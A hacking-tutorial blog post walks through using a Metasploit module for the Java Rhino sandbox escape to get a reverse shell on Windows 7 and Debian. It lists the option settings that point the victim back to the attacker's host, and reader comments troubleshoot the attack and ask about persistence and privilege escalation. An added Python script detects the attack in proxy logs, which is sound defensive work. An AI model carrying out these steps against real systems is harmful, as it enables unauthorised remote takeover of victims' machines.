Hacking Windows 7 SP1 via Java Rhino Script Engine Vulnerability


Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R 1

Victim O.S : Windows 7 SP 1, Linux Debian 6

Exploit Credits : Michael Schierl, Juan Vazquez, Edward D. Teach, Sinn3r

This is a vulnerability in the Rhino Script Engine that can be used by a Java Applet to run arbitrary Java code outside of the sandbox. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The quote above comes from zerodayinitiative.com. This exploit attacks a vulnerability found in the Java Runtime Environment; all Java versions 6 and 7 are affected. For details of the affected Java versions, refer to this Oracle advisory (http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html).

Requirements :

1. Java Rhino Exploit (download link) and Exploit.class


Step By Step :

1. Download the Java Rhino exploit from the link above, and then copy it into the following folder:

cp java_rhino.rb /pentest/exploits/framework/modules/exploits/multi/browser/

2. Open your Metasploit console by typing msfconsole in a terminal, then use the exploit you've just added and set up the payload.


3. Next, define the options below so the attack can be launched successfully. Once everything looks fine, we're ready to run the exploit, which starts the exploit server.


Information :

set srvhost 192.168.8.93 --> attacker ip address

set srvport 80 --> attacker local port to open

set uripath java_rhino --> uripath to send to victim

set lhost 192.168.8.93 --> address for the reverse connection if the attack is successful

set lport 443 --> local port to handle the victim connection if the attack succeeds

exploit --> run the exploit

4. The picture below is a screenshot from the victim's machine when he/she opened the malicious URL.


5. As soon as the victim opens our malicious link, our Metasploit console gets something interesting.


Note: if you got this error :

Exception handling request: No such file or directory – /opt/framework3/msf3/data/exploits/cve-2011-3544/Exploit.class

see the first comment below for how to solve it.

6. The picture below is from when I tried it on Debian 6 Iceweasel.


Pwn3d!

Countermeasure :

1. Update your Java Runtime to a newer version.
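To find hosts that still need this update, a defender can look for the network trace the attack leaves: the Java plug-in itself downloading an applet archive from a bare IP address. The following is an added example, not part of the original tutorial or of Metasploit. The log layout, the sample lines and the MIN_UPDATE thresholds are assumptions; take the real patched update numbers from the Oracle advisory linked above.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# PLACEHOLDER thresholds: lowest patched update per Java family. Replace
# with the values from the Oracle advisory linked in the article.
MIN_UPDATE = {6: 999, 7: 999}
# Assumed log layout: timestamp client method url status "user-agent"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
# Java 6/7 runtimes identify themselves as e.g. "Java/1.6.0_26".
JAVA_UA_RE = re.compile(r'\bJava/1\.(\d+)\.\d+(?:_(\d+))?')

def host_is_ip_literal(url):
    """True when the URL's host is a bare IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(urlsplit(url).hostname or "")
        return True
    except ValueError:
        return False

def triage(lines, min_update=MIN_UPDATE):
    """Flag JAR/class downloads made by a Java runtime from a bare-IP host."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than guess
        _ts, client, _method, url, _status, ua = m.groups()
        java = JAVA_UA_RE.search(ua)
        is_archive = urlsplit(url).path.lower().endswith((".jar", ".class"))
        if not (java and is_archive and host_is_ip_literal(url)):
            continue
        family, update = int(java.group(1)), int(java.group(2) or 0)
        findings.append({"client": client, "url": url,
                         "java": f"{family}u{update}",
                         "outdated": update < min_update.get(family, 0)})
    return findings

# Constructed sample lines (not a real capture); the URL layout is assumed.
SAMPLE = [
    '2011-12-01T10:00:01 10.0.0.21 GET http://192.168.8.93/java_rhino 200 "Mozilla/5.0 (Windows NT 6.1; rv:8.0) Firefox/8.0"',
    '2011-12-01T10:00:02 10.0.0.21 GET http://192.168.8.93/java_rhino/Applet.jar 200 "Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_26"',
    '2011-12-01T10:05:00 10.0.0.30 GET http://intranet.example/tools.jar 200 "Mozilla/4.0 (Windows 7 6.1) Java/1.6.0_26"',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Each finding names the client whose Java runtime fetched the archive and the runtime version it reported, which is the host to patch or investigate first.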

 


Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com


  • siddy

    PROBLEM

    [*] Server started.
    msf exploit(java_rhino) > [*] Java Applet Rhino Script Engine Remote Code Execution handling request from 192.16x.xxx.x:2287…
    [-] Exception handling request: No such file or directory – /opt/framework3/msf3/data/exploits/cve-2011-3544/Exploit.class

    • v4L

      #siddy
      If you are connected to the internet, try to msfupdate your Metasploit library; maybe there's some class missing.
      If you don't have it, you can download it here http://www.mediafire.com/?3krwncd52d3i2dv and put it in the folder /opt/framework3/msf3/data/exploits/cve-2011-3544/

  • Tom

    Hi man great blog 🙂 Your article's clear but i got some questions for you :
    1. Is there a way to use this rhino with SET java applet attack ?
    2. rhino attack has limited privileges and can't make use of "run persistance" backdoor, is there a workaround for that ?
    "java/java version of Meterpreter is not supported with this Script!"
     

    3. that attack has a poor level of privileges and it's only possible to upload-download files; for other commands it returns errors such as
     
    " stdapi_sys_config_getprivs: Operation failed: 1 "
    Loading extension priv…
    [-] Failed to load extension: No such file or directory – /pentest/framework-3.7.1/msf3/data/meterpreter/ext_server_priv.jar
    How to fix that ? i found no solution on net 🙁 . Thanx for ur help
     
    My system is : OS          : Windows 7 6.1 (x86)
    Meterpreter : java/java
     

  • Alok

    Hi
    Thanks for this great article. Can I get the payload for this exploit, as it's not available at the link mentioned? My Email is prabhatalok86@hotmail.com
     

  • Nazmi Hashim

    Hi, great article you posted there, erm, 1 question:
    why does this exploit only work when using the Firefox browser but not Google Chrome?

  • yaser

     
    Hi, nice blog. How come it won't create the meterpreter session for me? The only output that I receive is the following:
    [*] 10.1.41.3   java rhino  –  Java Applet Rhino Script Engine Remote Code Execution handling request
    [*] 10.1.41.3   java rhino  –  sending Applet.jar

    • v4L

      #yaser
      maybe the victim uses a newer Java version